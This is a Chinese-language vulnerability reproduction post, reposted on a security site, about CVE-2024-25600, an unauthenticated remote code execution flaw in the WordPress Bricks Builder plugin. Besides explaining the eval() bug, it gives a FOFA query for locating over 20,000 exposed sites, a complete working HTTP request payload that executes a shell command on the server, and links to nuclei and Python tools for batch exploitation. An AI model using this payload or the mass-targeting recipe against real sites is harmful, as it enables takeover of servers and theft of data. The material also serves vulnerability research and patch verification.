漏洞复现-WordPres RCE(CVE-2024-25600)

admin 2024年2月23日17:38:27评论300 views字数 1618阅读5分23秒阅读模式
免责声明

 

本公众号着重分享技术内容,所提供信息旨在促进技术交流。对于因信息使用而引起的任何损失,本公众号及作者概不负责。请谨慎行事,安全至上。

前言

 

讨论 WordPress Bricks Builder 插件中最近发现的一个严重漏洞,该漏洞允许未经身份验证的远程代码执行 (RCE)。此漏洞的编号为 CVE-2024–25600。

漏洞复现-WordPres RCE(CVE-2024-25600)

技术分析

该漏洞的存在是由于 Bricks Builder 插件中 PHP 的 eval() 函数的不当使用造成的。受影响的代码可以在BricksQuery类中找到,特别是在prepare_query_vars_from_settings 方法中。在此方法中,名为 $php_query_raw 的变量被传递给 eval() 函数,该函数允许攻击者在目标服务器上执行任意 PHP 代码。

代码示例:

public  static  function  prepare_query_vars_from_settings ( $settings = [], $fallback_element_id = '' )      $execute_user_code = function ( ) use ( $php_query_raw )   {         $user_result = null ; // 初始化一个变量来捕获用户代码的结果        // 使用输出缓冲捕获用户代码输出        ob_start ();         $user_result = eval ( $php_query_raw ); // 执行用户代码——罪魁祸首        ob_get_clean (); // 获取捕获的输出        return  $user_result ; // 返回用户代码结果    }; }

影响范围

Bricks Builder 版本 <= 1.9.6 中未经身份验证的 RCE 漏洞允许攻击者在目标服务器上执行任意命令。可能会导致受影响的 WordPress 站点完全受到攻击,从而导致未经授权的访问、数据盗窃以及进一步利用服务器进行恶意目的。由于该漏洞可以被未经身份验证的用户利用,因此攻击面明显更广,使大量网站面临潜在的利用风险。

漏洞复现

fofa:body="/wp-content/themes/bricks/"

漏洞复现-WordPres RCE(CVE-2024-25600)

可以看到存在数量2w+,不少。漏洞复现-WordPres RCE(CVE-2024-25600)

先获取网站nonce值漏洞复现-WordPres RCE(CVE-2024-25600)

POC:替换[HOST]为目标网站和[NONCE]POST /wp-json/bricks/v1/render_element HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36Connection: closeContent-Length: 356Content-Type: application/jsonAccept-Encoding: gzip{  "postId": "1",  "nonce": "上一步获取的nonce值",  "element": {    "name": "container",    "settings": {      "hasLoop": "true",      "query": {        "useQueryEditor": true,        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",        "objectType": "post"      }    }  }}

漏洞复现-WordPres RCE(CVE-2024-25600)

批量验证:

nuclei模板批量验证:

漏洞复现-WordPres RCE(CVE-2024-25600)

python脚本批量验证:漏洞复现-WordPres RCE(CVE-2024-25600)

项目地址

模板:https://github.com/Christbowel/CVE-2024-25600_Nuclei-Template#/
脚本:https://github.com/Chocapikk/CVE-2024-25600#/

 

原文始发于微信公众号(大仙安全说):漏洞复现-WordPres RCE(CVE-2024-25600)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月23日17:38:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现-WordPres RCE(CVE-2024-25600)http://cn-sec.com/archives/2519675.html

发表评论

匿名网友 填写信息